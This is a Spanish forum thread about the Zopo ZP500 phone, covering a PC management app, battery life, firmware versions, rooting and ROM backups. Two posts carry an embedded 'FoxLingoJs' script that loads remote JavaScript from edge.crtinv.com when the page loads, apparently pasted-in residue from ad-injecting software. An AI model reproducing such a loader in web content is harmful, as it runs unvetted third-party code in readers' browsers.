Zopo Zp500 Libero, primeras impresiones y herramientas

Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

Aqui os dejo una aplicación que se instala en vuestro pc de windows y en el telefono. Esta aplicación gestiona contactos , tonos de llamada,etc. Es un buen programa por lo que he visto y vale la pena probarlo:

http://www.snappea.com/


i1229.photobucket.com_albums_ee479_imput1_zopo_20500_2012_09_08_1628.png



  • Manage your Android from your PC

    Organize your contacts, music, and pics from the comfort of your desktop. Transfer any file in the blink of an eye.
  • Download apps for FREE

    Download thousands of apps for your Android, instant and free of charge.
  • Save your data plan

    Apps download to the desktop, so you no longer need to worry about your mobile data plan.
  • Text message from your computer

    Send text messages from a full-size keyboard, without touching your phone. It's like magic.
  • Import your iTunes music

    Importing your iTunes library to your Android is just a click away. Don't leave home without your music ever again.


<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();</script>


Ale, que la disfruteis.

@GAYAFON, @maple, esta herramienta la podriamos probar en otros modelos de zopo u otros moviles, creo que funcionará. Luego abrir un post en generla de android o a ver donde lo podemos ubicar.


Saludos.

Excelente!!!
Era lo que estaba buscando. Por lo menos para la gestión de contactos.
Es tan fácil que no creo que sea un gran problema que solo esté disponible en inglés.
He probado también Moborobo y AirDroid y no han terminado de convencerme como esta.
Para mí su punto fuerte está en la gestión de contactos. Muy sencilla y con muchas opciones.
Lo demás, solo lo he mirado por encima.
 
Última edición por un moderador:
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

Excelente!!!
Era lo que estaba buscando. Por lo menos para la gestión de contactos.
Es tan fácil que no creo que sea un gran problema que solo esté disponible en inglés.
He probado también Moborobo y AirDroid y no han terminado de convencerme como esta.
Para mí su punto fuerte está en la gestión de contactos. Muy sencilla y con muchas opciones.
Lo demás, solo lo he mirado por encima.

Pues lo que yo he visto va de cine, desde pasar archivos por wifi sin conectar usb, instalar apk que tengas en el pc, etc......


Oye, una pregunta, tu tenias la bateria de 2000mA creo recordar, cuanto te dura?

Otra cosa, que firmware tienes instalado ahora y si te funciona todo bien.


Tu has probado ha hacer backups desde el recovery probar a restaurarlos a ver si funcionan?


Saludos.
 
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

La batería me ha llegado a durar casi tres días, pero con un consumo normal sin jugar apenas.
Ahora que me estoy enganchando a la Realidad Aumentada, me como la batería en un día, pero la diferencia con la de 1.300 es grande en duración y pequeña en tamaño y peso.

Sigo con el mismo Firmware que vino. Es tan estable que no he visto necesidad de tocarlo. Hasta me da miedo hacerlo. Tampoco he probado las BackUps desde el Recovery. La verdad es que desde que tengo el ZP500 solo me he dedicado a tocar los firmwares y las ROMS de los teléfonos de mis amigos.... :yaeh am not durnk:
 
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

La batería me ha llegado a durar casi tres días, pero con un consumo normal sin jugar apenas.
Ahora que me estoy enganchando a la Realidad Aumentada, me como la batería en un día, pero la diferencia con la de 1.300 es grande en duración y pequeña en tamaño y peso.

Sigo con el mismo Firmware que vino. Es tan estable que no he visto necesidad de tocarlo. Hasta me da miedo hacerlo. Tampoco he probado las BackUps desde el Recovery. La verdad es que desde que tengo el ZP500 solo me he dedicado a tocar los firmwares y las ROMS de los teléfonos de mis amigos.... :yaeh am not durnk:

Tu conseguistes rootear el movil?, pero no pusistes la ultima version que habia en la web, la del 2/7 ?

Yo tengo la de fabrica y no se puede rootear. Estoy esperando a terminar la review, que ya la he terminado,para meterle mano, cambiar el firmware y empezar a trastear con el zopo500.

Probé ha hacer un backup desde el recovery de CWM (que lo tengo instalado desde el primer dia) y no me termina el backup o al menos no me aparece ningun mensaje cuando termina de hacerlo, porque deberia de dar un mensaje al final. Has probado tu ha hacer un backup desde el recovery de CWM o no lo tienes instalado?

Saludos.
 
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

Compré el Terminal Rooteado y sin apps chinas en la web de Zopo.
Si te vale de algo intento extraer la ROM entera, tal y como está ahora para probarla.
Si te funciona, hago un reseteo de fábrica y saco la ROM limpia.
Esto es algo que no he hecho nunca (extraer la ROM) por lo que necesitaré al menos un pequeño tuto.
Salu2
 
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

Compré el Terminal Rooteado y sin apps chinas en la web de Zopo.
Si te vale de algo intento extraer la ROM entera, tal y como está ahora para probarla.
Si te funciona, hago un reseteo de fábrica y saco la ROM limpia.
Esto es algo que no he hecho nunca (extraer la ROM) por lo que necesitaré al menos un pequeño tuto.
Salu2

Gracias, ya te diré algo mañana.

Eso si que podrias hacer, Escribirnos que version y banda base tienes instalada de fábrica con root y sin apks chinas.

Ahora mismo estoy subiendole la ultima version que hay colgada, del 12 de agosto.

A ver como va. Segun dicen está ya rooteada.



Saludos y perdona las molestias.
 
Android 4.03
Num. Compilación:
120702.ICS.V1.FWGA.CN.COM.4P4
Banda base:
MAUI.11.AMD.W11.50.5P.V14
2012/6/05
Kernel: 3.0.13
Un saludo.

Enviado desde mi ZP500 usando Tapatalk 2
 
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

A mi no me ha ocurrido esto. Supongo que se solucionará actualizando a la ultima version de firmware.

Saludos.


<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

breakk entiendo que esta es la ultima. Hay una mas nueva que la 120810?

Saludos
 
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

Eso es porque esta como aplicacion de sistema.

Desinstalala y bajala del market

Meite GT-G70 patrocinado por Lightake

Como no se si te referías a lo de Maps o a lo del calendario, te pongo las dudas que tengo en las dos.

- Calendario: No me sincroniza con la aplicación que ponía @C3PO, he buscado en el Market la aplicación de sincronización y no aparece.

- Maps: Voy a aplicaciones y no me deja desinstalarla, solo deshabilitarla

A ver si me podéis ayudar.

Gracias.
 
Última edición por un moderador:
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

Android 4.03
Num. Compilación:
120702.ICS.V1.FWGA.CN.COM.4P4
Banda base:
MAUI.11.AMD.W11.50.5P.V14
2012/6/05
Kernel: 3.0.13
Un saludo.

Enviado desde mi ZP500 usando Tapatalk 2

Pues este firmware es el que tenia yo al zopo cuando me vino de la tienda pero me fué imposible rootearlo por ningún método.


La última versión de firmware, solventa el problema del brillo de pantalla, añade un icono de llamada al desbloqueo de la pantalla y no se si hay algo mas, todavia estoy revisandola. Además es ROOT de origen y limpia, sin apks chinas.

A ver si tengo un rato y pruebo un sistema con un script para hacer el backup desde el movil y te lo explico para poderla sacar y asi tenerla nosotros en la base de firmwares de fábrica. Eso si, tendrias que hacer un hard reset y te quitaré los archivos que llevan tus IMEIS y datos.

Saludos y gracias.
 
Re: Zopo Zp500 Libero, primeras impresiones y sus herramientas

breakk entiendo que esta es la ultima. Hay una mas nueva que la 120810?

Saludos

A dia de ayer no. Estuve hablando con Zopo y me mandaron esta versión como la última. Ademas en la pagina web de Zopo, esta versión 120810 es la que hay puesta para descarga.

A ver si saco algo de tiempo, entre la review que terminé ayer y las tareas de casa, ufff, y me pongo con el tema de los firmwares.

Hay un firmware de un vietnamita, haiduongbk, que justamente tambien está registrado en este foro y ha ayudado mucho aportando sus firmwares para HD7+, a ver si consigo hablar con él y que se pase por el hilo que haremos de firmwares no oficiales.


Saludos.
 
Última edición por un moderador:

Del blog

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba